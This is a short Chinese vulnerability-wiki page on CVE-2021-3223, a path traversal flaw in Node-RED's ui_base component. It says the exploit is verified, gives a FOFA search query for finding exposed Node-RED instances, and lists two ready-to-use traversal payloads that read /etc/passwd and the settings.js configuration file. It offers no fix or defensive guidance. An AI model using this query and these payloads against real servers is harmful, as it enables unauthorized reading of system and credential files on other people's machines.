# CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞/zh-cn
{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| 
| align=”center” |”’该漏洞已通过验证”’
——
本页面的EXP/POC/Payload经测试可用,漏洞已经成功复现。
|}
==漏洞影响==
Node-RED
==FOFA==
title="Node-RED"
==POC==
/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /ui_base/js/..%2f..%2f..%2f..%2fsettings.js
==参考==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容